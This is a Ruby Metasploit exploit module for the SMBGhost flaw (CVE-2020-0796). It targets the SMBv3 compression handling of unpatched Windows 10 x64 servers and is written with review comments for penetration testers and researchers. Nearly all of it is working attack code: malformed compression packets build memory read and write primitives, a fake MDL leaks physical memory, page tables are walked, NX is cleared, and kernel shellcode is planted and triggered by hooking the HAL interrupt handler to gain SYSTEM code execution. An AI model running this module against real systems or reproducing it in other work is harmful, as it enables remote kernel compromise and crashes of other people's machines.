##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  LZNT1 = RubySMB::Compression::LZNT1

  # KUSER_SHARED_DATA offsets, these are defined by the module and are therefore target independent
  KSD_VA_MAP = 0x800
  KSD_VA_PMDL = 0x900
  KSD_VA_SHELLCODE = 0x950 # needs to be the highest offset for #cleanup

  # Retry budget for #read_primitive: up to MAX_READ_RETRIES * 2 fake-MDL write rounds,
  # each followed by up to MAX_READ_RETRIES read attempts.
  MAX_READ_RETRIES = 5
  # Maximum number of bytes handed to a single #write_primitive call when transferring the
  # shellcode in #exploit or zeroing memory in #cleanup.
  WRITE_UNIT = 0xd0

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'SMBv3 Compression Buffer Overflow',
        'Description' => %q{
          A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to
          execute code on a vulnerable server. This remote exploit implementation leverages this flaw to execute code
          in the context of the kernel, finally yielding a session as NT AUTHORITY\SYSTEM in spoolsv.exe. Exploitation
          can take a few minutes as the necessary data is gathered.
        },
        'Author' => [
          'hugeh0ge', # Ricerca Security research, detailed technique description
          'chompie1337', # PoC on which this module is based
          'Spencer McIntyre', # msf module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2020-0796' ],
          [ 'URL', 'https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html' ],
          [ 'URL', 'https://github.com/chompie1337/SMBGhost_RCE_PoC' ],
          # the rest are not cve-2020-0796 specific but are on topic regarding the techniques used within the exploit
          [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
          [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
          [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'thread',
          'WfsDelay' => 10
        },
        'Privileged' => true,
        'Payload' => {
          'Space' => 600,
          'DisableNops' => true
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows 10 v1903-1909 x64',
            {
              'Platform' => 'win',
              'Arch' => [ARCH_X64],
              'OverflowSize' => 0x1100,
              'LowStubFingerprint' => 0x1000600e9,
              'KuserSharedData' => 0xfffff78000000000,
              # Offset(From,To) => Bytes
              'Offset(HalpInterruptController,HalpApicRequestInterrupt)' => 0x78,
              'Offset(LowStub,SelfVA)' => 0x78,
              'Offset(LowStub,PML4)' => 0xa0,
              'Offset(SrvnetBufferHdr,pMDL1)' => 0x38,
              'Offset(SrvnetBufferHdr,pNetRawBuffer)' => 0x18
            }
          ]
        ],
        'DisclosureDate' => '2020-03-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'AKA' => [ 'SMBGhost', 'CoronaBlue' ],
          'Stability' => [ CRASH_OS_RESTARTS, ],
          'Reliability' => [ REPEATABLE_SESSION, ],
          'RelatedModules' => [ 'exploit/windows/local/cve_2020_0796_smbghost' ],
          'SideEffects' => []
        }
      )
    )
    register_options([Opt::RPORT(445),])
    register_advanced_options([
      OptBool.new('DefangedMode', [true, 'Run in defanged mode', true])
    ])
  end

  # Negotiates SMB3 with the target and inspects the negotiated dialect and compression support.
  #
  # @return [CheckCode] Unknown if the negotiation raises.
  #   Safe unless the server negotiates SMB3 dialect 0x0311 and advertises LZNT1 compression.
  #   Detected otherwise.
  def check
    begin
      client = RubySMB::Client.new(
        RubySMB::Dispatcher::Socket.new(connect(false)),
        username: '',
        password: '',
        smb1: false,
        smb2: false,
        smb3: true
      )
      protocol = client.negotiate
      client.disconnect!
    rescue Rex::Proto::SMB::Exceptions::Error, RubySMB::Error::RubySMBError, Errno::ECONNRESET
      return CheckCode::Unknown
    rescue ::Exception => e # rubocop:disable Lint/RescueException
      vprint_error("#{rhost}: #{e.class} #{e}")
      return CheckCode::Unknown
    end

    return CheckCode::Safe unless protocol == 'SMB3'
    return CheckCode::Safe unless client.dialect == '0x0311'

    lznt1_algorithm = RubySMB::SMB2::CompressionCapabilities::COMPRESSION_ALGORITHM_MAP.key('LZNT1')
    return CheckCode::Safe unless client.server_compression_algorithms.include?(lznt1_algorithm)

    CheckCode::Detected
  end

  # Opens a new TCP connection and sends a raw SMB2 NEGOTIATE request.
  #
  # The request offers the RubySMB default SMB2 + SMB3 dialects, a SHA-512 pre-auth integrity
  # context and an LZNT1 compression context. The response is NOT read here; callers read the raw
  # reply from the returned dispatcher's socket because it may not be a well-formed SMB response.
  #
  # @return [RubySMB::Dispatcher::Socket] dispatcher wrapping the new socket (caller must close it)
  def smb_negotiate
    # need a custom negotiate function because the responses will be corrupt while reading memory
    sock = connect(false)
    dispatcher = RubySMB::Dispatcher::Socket.new(sock)

    packet = RubySMB::SMB2::Packet::NegotiateRequest.new
    packet.client_guid = SecureRandom.random_bytes(16)
    packet.set_dialects((RubySMB::Client::SMB2_DIALECT_DEFAULT + RubySMB::Client::SMB3_DIALECT_DEFAULT).map { |d| d.to_i(16) })

    packet.capabilities.large_mtu = 1
    packet.capabilities.encryption = 1

    nc = RubySMB::SMB2::NegotiateContext.new(
      context_type: RubySMB::SMB2::NegotiateContext::SMB2_PREAUTH_INTEGRITY_CAPABILITIES
    )
    nc.data.hash_algorithms << RubySMB::SMB2::PreauthIntegrityCapabilities::SHA_512
    nc.data.salt = "\x00" * 32
    packet.add_negotiate_context(nc)

    nc = RubySMB::SMB2::NegotiateContext.new(
      context_type: RubySMB::SMB2::NegotiateContext::SMB2_COMPRESSION_CAPABILITIES
    )
    nc.data.flags = 1
    nc.data.compression_algorithms << RubySMB::SMB2::CompressionCapabilities::LZNT1
    packet.add_negotiate_context(nc)

    dispatcher.send_packet(packet)
    dispatcher
  end

  # Sends one malformed compression transform intended to write +data+ to the target address +addr+.
  #
  # The transform carries +data+ uncompressed (it is the +offset+ prefix). It is followed by an LZNT1
  # stream that decompresses to:
  #   * filler, so that filler + data spans target['OverflowSize'] bytes;
  #   * zeros up to the 'Offset(SrvnetBufferHdr,pNetRawBuffer)' offset;
  #   * +addr+ as a little-endian QWORD.
  # The original segment size is declared as 0xffffffff.
  # NOTE(review): per the offset names, the intent is that +addr+ overwrites the SRVNET buffer's
  # pNetRawBuffer so the uncompressed prefix is copied there — confirm against the referenced write-ups.
  #
  # @param data [String] bytes to write; must be at most target['OverflowSize'] bytes long
  # @param addr [Integer] destination virtual address
  def write_primitive(data, addr)
    dispatcher = smb_negotiate
    dispatcher.tcp_socket.get_once  # disregard the response

    uncompressed_data = rand(0x41..0x5a).chr * (target['OverflowSize'] - data.length)
    uncompressed_data << "\x00" * target['Offset(SrvnetBufferHdr,pNetRawBuffer)']
    uncompressed_data << [ addr ].pack('Q<')

    pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(
      original_compressed_segment_size: 0xffffffff,
      compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,
      offset: data.length,
      compressed_data: (data + LZNT1.compress(uncompressed_data)).bytes
    )
    dispatcher.send_packet(pkt)
    dispatcher.tcp_socket.close
  end

  # Sends a compression transform whose LZNT1 stream comes from CorruptLZNT1.
  #
  # The uncompressed prefix is filler of target['OverflowSize'] + +offset+ bytes. The compressed part
  # is +data+ encoded by CorruptLZNT1, and the original segment size is declared as 0xffffefff.
  # #read_primitive uses this with the 'Offset(SrvnetBufferHdr,pMDL1)' offset to plant a pointer
  # to the fake MDL.
  # NOTE(review): the exact landing spot of +data+ relative to the SRVNET buffer header is implied by
  # the offset names only — confirm.
  #
  # @param data [String] bytes to place (here: a packed QWORD pointer)
  # @param offset [Integer] byte offset added to the filler length
  def write_srvnet_buffer_hdr(data, offset)
    dispatcher = smb_negotiate
    dispatcher.tcp_socket.get_once  # disregard the response

    dummy_data = rand(0x41..0x5a).chr * (target['OverflowSize'] + offset)
    pkt = RubySMB::SMB2::Packet::CompressionTransformHeader.new(
      original_compressed_segment_size: 0xffffefff,
      compression_algorithm: RubySMB::SMB2::CompressionCapabilities::LZNT1,
      offset: dummy_data.length,
      compressed_data: (dummy_data + CorruptLZNT1.compress(data)).bytes
    )
    dispatcher.send_packet(pkt)
    dispatcher.tcp_socket.close
  end

  # Leaks up to ~600 bytes of target physical memory starting at +phys_addr+.
  #
  # Results are memoised in @memory_cache keyed by +phys_addr+. Each round does the following:
  #   1. Writes a fake MDL, followed by three copies of the page frame number, into
  #      KUSER_SHARED_DATA + KSD_VA_PMDL.
  #   2. Plants a pointer to that MDL via #write_srvnet_buffer_hdr.
  #   3. Makes up to MAX_READ_RETRIES fresh negotiate connections.
  # The first reply that is non-nil and does not carry "\xfeSMB" at bytes 4..7 (a normal SMB2
  # response) is taken as the leaked data. MDL byte_offset adds 4 to the in-page offset,
  # presumably to account for the 4-byte transport header preceding the reply — TODO confirm.
  # Rounds are separated by a quadratic back-off sleep.
  #
  # @param phys_addr [Integer] physical address to read
  # @return [String] raw reply bytes
  # @raise via fail_with(Failure::Unknown) when every attempt fails
  def read_primitive(phys_addr)
    value = @memory_cache[phys_addr]
    return value unless value.nil?

    vprint_status("Reading from physical memory at index: 0x#{phys_addr.to_s(16).rjust(16, '0')}")
    fake_mdl = MDL.new(
      mdl_size: 0x48,
      mdl_flags: 0x5018,
      mapped_system_va: (target['KuserSharedData'] + KSD_VA_MAP),
      start_va: ((target['KuserSharedData'] + KSD_VA_MAP) & ~0xfff),
      byte_count: 600,
      byte_offset: ((phys_addr & 0xfff) + 0x4)
    )
    phys_addr_enc = (phys_addr & 0xfffffffffffff000) >> 12

    rounds = MAX_READ_RETRIES * 2
    rounds.times do |try|
      write_primitive(fake_mdl.to_binary_s + ([ phys_addr_enc ] * 3).pack('Q<*'), (target['KuserSharedData'] + KSD_VA_PMDL))
      write_srvnet_buffer_hdr([(target['KuserSharedData'] + KSD_VA_PMDL)].pack('Q<'), target['Offset(SrvnetBufferHdr,pMDL1)'])

      MAX_READ_RETRIES.times do |_|
        dispatcher = smb_negotiate
        blob = dispatcher.tcp_socket.get_once
        dispatcher.tcp_socket.close
        next if blob.nil?
        next if blob[4..7] == "\xfeSMB".b

        @memory_cache[phys_addr] = blob
        return blob
      end
      # no point backing off after the final round; fail immediately instead
      sleep try**2 unless try == rounds - 1
    end

    fail_with(Failure::Unknown, 'Failed to read physical memory')
  end

  # Truncates +buff+ to a whole number of 8-byte QWORDs.
  #
  # Unlike `buff[0...-(buff.length % 8)]`, this keeps the whole buffer when its length is already
  # a multiple of 8. The `-0` form returns an empty string in that case.
  #
  # @param buff [String] raw bytes, e.g. from #read_primitive
  # @return [String] the longest prefix of +buff+ whose length is a multiple of 8
  def qword_aligned(buff)
    buff[0, buff.length - (buff.length % 8)]
  end

  # Locates the low stub page by scanning target physical memory.
  #
  # Pages 0x1000..0x100000 are tried in 0x1000 steps, with 0x13000 tried first. A page matches
  # when its first QWORD equals target['LowStubFingerprint'], ignoring bits 8-15. From the
  # matching page it reads:
  #   * the self virtual address at 'Offset(LowStub,SelfVA)';
  #   * the PML4 physical address at 'Offset(LowStub,PML4)'.
  # The HAL heap base is that virtual address rounded down to a 64 KiB boundary.
  #
  # @return [Hash] { pml4: Integer, phal_heap: Integer }
  # @raise via fail_with(Failure::Unknown) if no page matches
  def find_low_stub
    common = [0x13000].to_enum # try the most common value first
    all = (0x1000..0x100000).step(0x1000)
    (common + all).each do |index|
      buff = read_primitive(index)
      entry = buff.unpack('Q<').first
      next unless (entry & 0xffffffffffff00ff) == (target['LowStubFingerprint'] & 0xffffffffffff00ff)

      lowstub_va = buff[target['Offset(LowStub,SelfVA)']...(target['Offset(LowStub,SelfVA)'] + 8)].unpack('Q<').first
      print_status("Found low stub at physical address 0x#{index.to_s(16).rjust(16, '0')}, virtual address 0x#{lowstub_va.to_s(16).rjust(16, '0')}")
      pml4 = buff[target['Offset(LowStub,PML4)']...(target['Offset(LowStub,PML4)'] + 8)].unpack('Q<').first
      print_status("Found PML4 at 0x#{pml4.to_s(16).rjust(16, '0')} " + { 0x1aa000 => '(BIOS)', 0x1ad000 => '(UEFI)' }.fetch(pml4, ''))

      phal_heap = lowstub_va & 0xffffffffffff0000
      print_status("Found HAL heap at 0x#{phal_heap.to_s(16).rjust(16, '0')}")

      return { pml4: pml4, phal_heap: phal_heap }
    end

    fail_with(Failure::Unknown, 'Failed to find the low stub')
  end

  # Finds the PML4 entry that points back at the PML4 itself (the self-reference entry).
  #
  # Scans up to 0x1000 bytes starting at pointers[:pml4]. Entries are compared after masking
  # with 0xfffff000. The index of the first match (0..0x1ff) is stored as pointers[:pml4_selfref].
  #
  # @param pointers [Hash] must contain :pml4 (physical address); mutated in place
  # @return [Hash] +pointers+ with :pml4_selfref added
  # @raise via fail_with(Failure::Unknown) if no self-reference is found
  def find_pml4_selfref(pointers)
    search_len = 0x1000
    index = pointers[:pml4]

    while search_len > 0
      buff = qword_aligned(read_primitive(index))
      buff.unpack('Q<*').each_with_index do |entry, i|
        entry &= 0xfffff000
        next unless entry == pointers[:pml4]

        selfref = ((index + (i * 8)) & 0xfff) >> 3
        pointers[:pml4_selfref] = selfref
        print_status("Found PML4 self-reference entry at 0x#{selfref.to_s(16).rjust(4, '0')}")
        return pointers
      end
      # always make forward progress, even if the leak was shorter than one QWORD
      search_len -= [buff.length, 8].max
      index += [buff.length, 8].max
    end

    fail_with(Failure::Unknown, 'Failed to leak the PML4 self reference')
  end

  # Translates a virtual address to a physical address by walking the 4-level page tables.
  #
  # Each level is read with #read_primitive. If the page-directory entry has bit 7 (the large-page
  # flag) set, the walk stops there. Otherwise the page-table entry is read.
  # NOTE(review): every table entry is masked with 0xfffff000, so only the low 32 bits of each frame
  # address are kept — physical addresses above 4 GiB will not be resolved correctly.
  #
  # @param pointers [Hash] must contain :pml4 (physical address of the PML4)
  # @param va_addr [Integer] virtual address to translate
  # @return [Integer] physical address
  def get_phys_addr(pointers, va_addr)
    pml4_index = (((1 << 9) - 1) & (va_addr >> (40 - 1)))
    pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1)))
    pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1)))
    pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1)))

    pml4e = pointers[:pml4] + pml4_index * 8
    pdpt_buff = read_primitive(pml4e)

    pdpt = pdpt_buff.unpack('Q<').first & 0xfffff000
    pdpte = pdpt + pdpt_index * 8
    pdt_buff = read_primitive(pdpte)

    pdt = pdt_buff.unpack('Q<').first & 0xfffff000
    pdte = pdt + pdt_index * 8
    pt_buff = read_primitive(pdte)

    pt = pt_buff.unpack('Q<').first
    unless pt & (1 << 7) == 0
      # large page: the remaining index bits select the 4 KiB sub-page directly
      return (pt & 0xfffff000) + (pt_index & 0xfff) * 0x1000 + (va_addr & 0xfff)
    end

    pt &= 0xfffff000
    pte = pt + pt_index * 8
    pte_buff = read_primitive(pte)
    (pte_buff.unpack('Q<').first & 0xfffff000) + (va_addr & 0xfff)
  end

  # Clears the execute-disable bit (bit 63) of the PTE mapping +addr+.
  #
  # The PTE's virtual address is derived from the PML4 self-reference index. Its current value is
  # read through physical memory, and the value with bit 63 cleared is written back with
  # #write_primitive.
  #
  # @param pointers [Hash] must contain :pml4 and :pml4_selfref
  # @param addr [Integer] virtual address whose PTE is modified
  # @return [Hash] { pte_va: Integer, original: Integer } so #cleanup can restore the entry
  def disable_nx(pointers, addr)
    lb = (0xffff << 48) | (pointers[:pml4_selfref] << 39)
    ub = ((0xffff << 48) | (pointers[:pml4_selfref] << 39) + 0x8000000000 - 1) & 0xfffffffffffffff8
    pte_va = ((addr >> 9) | lb) & ub

    phys_addr = get_phys_addr(pointers, pte_va)
    orig_val = read_primitive(phys_addr).unpack1('Q<')
    overwrite_val = orig_val & ((1 << 63) - 1)
    write_primitive([ overwrite_val ].pack('Q<'), pte_va)
    { pte_va: pte_va, original: orig_val }
  end

  # Searches the first 0x20000 bytes of the HAL heap for hal!HalpInterruptController.
  #
  # Each leaked buffer is scanned with an 8-QWORD sliding window. A window is a candidate when:
  #   * QWORDs 0-2 have their top 20 bits set;
  #   * QWORDs 4-7 have top 24 bits equal to 0xfffff8;
  #   * QWORD 3 is in 0x20..0x40;
  #   * QWORD 0 minus QWORD 2 is in 0x80..0x180.
  # A candidate is accepted only if the pointer at
  # 'Offset(HalpInterruptController,HalpApicRequestInterrupt)' leads to code starting with the
  # expected prologue bytes.
  #
  # @param pointers [Hash] must contain :pml4 and :phal_heap; mutated in place
  # @return [Hash] +pointers+ with :pHalpInterruptController and :pHalpApicRequestInterrupt added
  # @raise via fail_with(Failure::Unknown) if nothing matches
  def search_hal_heap(pointers)
    va_cursor = pointers[:phal_heap]
    end_va = va_cursor + 0x20000

    while va_cursor < end_va
      phys_addr = get_phys_addr(pointers, va_cursor)
      buff = qword_aligned(read_primitive(phys_addr))
      values = buff.unpack('Q<*')
      window_size = 8 # using a sliding window to fingerprint the memory
      0.upto(values.length - window_size) do |i| # TODO: if the heap structure exists over two pages, this will break
        va = va_cursor + (i * 8)
        window = values[i...(i + window_size)]
        next unless window[0...3].all? { |value| value & 0xfffff00000000000 == 0xfffff00000000000 }
        next unless window[4...8].all? { |value| value & 0xffffff0000000000 == 0xfffff80000000000 }
        next unless window[3].between?(0x20, 0x40)
        next unless (window[0] - window[2]).between?(0x80, 0x180)

        phalp_ari = read_primitive(get_phys_addr(pointers, va) + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']).unpack('Q<').first
        next if read_primitive(get_phys_addr(pointers, phalp_ari))[0...8] != "\x48\x89\x6c\x24\x20\x56\x41\x54" # mov qword ptr [rsp+20h], rbp; push rsi; push r12

        # looks legit (TM), lets hope for the best
        # use WinDBG to validate the hal!HalpInterruptController value manually
        # 0: kd> dq poi(hal!HalpInterruptController) L1
        pointers[:pHalpInterruptController] = va
        print_status("Found hal!HalpInterruptController at 0x#{va.to_s(16).rjust(16, '0')}")

        # use WinDBG to validate the hal!HalpApicRequestInterrupt value manually
        # 0: kd> dq u poi(poi(hal!HalpInterruptController)+78) L1
        pointers[:pHalpApicRequestInterrupt] = phalp_ari
        print_status("Found hal!HalpApicRequestInterrupt at 0x#{phalp_ari.to_s(16).rjust(16, '0')}")
        return pointers
      end

      # always make forward progress; a zero advance would re-read the same cached buffer forever
      va_cursor += [buff.length, 8].max
    end
    fail_with(Failure::Unknown, 'Failed to leak the address of hal!HalpInterruptController')
  end

  # Assembles the kernel-mode stub and appends the user payload.
  #
  # Reads external/source/exploits/CVE-2020-0796/RCE/kernel_shellcode.asm, assembles it with Metasm
  # for x64, and fixes up three symbols:
  #   * PHALP_APIC_REQUEST_INTERRUPT — the original handler address;
  #   * PPHALP_APIC_REQUEST_INTERRUPT — the address of the hooked table slot;
  #   * USER_SHELLCODE_SIZE — the payload length.
  #
  # @param pointers [Hash] must contain :pHalpApicRequestInterrupt and :pHalpInterruptController
  # @return [String] kernel stub bytes followed by the encoded payload
  def build_shellcode(pointers)
    source = File.read(File.join(Msf::Config.install_root, 'external', 'source', 'exploits', 'CVE-2020-0796', 'RCE', 'kernel_shellcode.asm'), mode: 'rb')
    edata = Metasm::Shellcode.assemble(Metasm::X64.new, source).encoded
    user_shellcode = payload.encoded
    edata.fixup 'PHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpApicRequestInterrupt]
    edata.fixup 'PPHALP_APIC_REQUEST_INTERRUPT' => pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)']
    edata.fixup 'USER_SHELLCODE_SIZE' => user_shellcode.length
    edata.data + user_shellcode
  end

  # Module entry point.
  #
  # Refuses to run while the DefangedMode advanced option is true, and requires an x64 payload.
  # It then:
  #   1. Locates the low stub and PML4, then the PML4 self-reference.
  #   2. Locates hal!HalpInterruptController on the HAL heap.
  #   3. Clears NX on the KUSER_SHARED_DATA page.
  #   4. Copies the shellcode to KUSER_SHARED_DATA + KSD_VA_SHELLCODE in WRITE_UNIT chunks.
  #   5. Overwrites the HalpApicRequestInterrupt slot with the shellcode address.
  # State needed by #cleanup is kept in @memory_cache, @nx_info and @shellcode_length.
  def exploit
    if datastore['DefangedMode']
      warning = <<~EOF


        Are you SURE you want to execute this module? There is a high probability that even when the exploit is
        successful the remote target will crash within about 90 minutes.

        Disable the DefangedMode option to proceed.
      EOF

      fail_with(Failure::BadConfig, warning)
    end

    fail_with(Failure::BadConfig, "Incompatible payload: #{datastore['PAYLOAD']} (must be x64)") unless payload.arch.include? ARCH_X64
    @memory_cache = {}
    @shellcode_length = 0
    pointers = find_low_stub
    pointers = find_pml4_selfref(pointers)
    pointers = search_hal_heap(pointers)

    @nx_info = disable_nx(pointers, target['KuserSharedData'])
    print_status('KUSER_SHARED_DATA PTE NX bit cleared!')

    shellcode = build_shellcode(pointers)
    vprint_status("Transferring #{shellcode.length} bytes of shellcode...")
    @shellcode_length = shellcode.length
    write_bytes = 0
    while write_bytes < @shellcode_length
      write_sz = [WRITE_UNIT, @shellcode_length - write_bytes].min
      write_primitive(shellcode[write_bytes...(write_bytes + write_sz)], (target['KuserSharedData'] + KSD_VA_SHELLCODE) + write_bytes)
      write_bytes += write_sz
    end
    vprint_status('Transfer complete, hooking hal!HalpApicRequestInterrupt to trigger execution...')
    write_primitive([(target['KuserSharedData'] + KSD_VA_SHELLCODE)].pack('Q<'), pointers[:pHalpInterruptController] + target['Offset(HalpInterruptController,HalpApicRequestInterrupt)'])
  end

  # Restores target state touched by #exploit.
  #
  # Does nothing unless @memory_cache is non-empty, i.e. at least one memory read succeeded.
  # Otherwise it:
  #   * writes back the original KUSER_SHARED_DATA PTE value if #disable_nx ran;
  #   * zeroes KUSER_SHARED_DATA from WRITE_UNIT bytes below KSD_VA_MAP up to the end of the
  #     transferred shellcode, in WRITE_UNIT-sized writes.
  def cleanup
    return unless @memory_cache&.present?

    if @nx_info&.present?
      print_status('Restoring the KUSER_SHARED_DATA PTE NX bit...')
      write_primitive([ @nx_info[:original] ].pack('Q<'), @nx_info[:pte_va])
    end

    # need to restore the contents of KUSER_SHARED_DATA to zero to avoid a bugcheck
    vprint_status('Cleaning up the contents of KUSER_SHARED_DATA...')
    start_va = target['KuserSharedData'] + KSD_VA_MAP - WRITE_UNIT
    end_va = target['KuserSharedData'] + KSD_VA_SHELLCODE + @shellcode_length
    # exclusive end: a cursor equal to end_va would only issue a pointless zero-length write
    (start_va...end_va).step(WRITE_UNIT).each do |cursor|
      write_primitive("\x00".b * [WRITE_UNIT, end_va - cursor].min, cursor)
    end
  end

  # LZNT1 encoder variant used by #write_srvnet_buffer_hdr.
  module CorruptLZNT1
    # Encodes +buf+ in +chunk_size+ chunks, emitting the compressed form of every chunk.
    #
    # The compressed form is emitted even when it is larger than the input. Each chunk gets a
    # 16-bit header of 0xb000 | (compressed length - 1). The stream ends with the 16-bit value
    # 0x1337 instead of a normal terminator.
    # NOTE(review): presumably the trailing 0x1337 is a deliberately bogus chunk header that makes
    # decompression stop with an error — confirm against [MS-XCA].
    #
    # @param buf [String] data to encode
    # @param chunk_size [Integer] uncompressed bytes per chunk
    # @return [String] encoded stream
    def self.compress(buf, chunk_size: 0x1000)
      out = ''
      until buf.empty?
        chunk = buf[0...chunk_size]
        compressed = LZNT1.compress_chunk(chunk)

        # always use the compressed chunk, even if it's larger
        out << [ 0xb000 | (compressed.length - 1) ].pack('v')
        out << compressed

        buf = buf[chunk_size..]
        break if buf.nil?
      end

      out << [ 0x1337 ].pack('v')
      out
    end
  end

  # Little-endian layout of the Windows x64 _MDL header, used to build the fake MDL in #read_primitive.
  class MDL < BinData::Record
    # https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_MDL
    endian :little
    uint64 :next_mdl
    uint16 :mdl_size
    uint16 :mdl_flags
    uint16 :allocation_processor_number
    uint16 :reserved
    uint64 :process
    uint64 :mapped_system_va
    uint64 :start_va
    uint32 :byte_count
    uint32 :byte_offset
  end
end
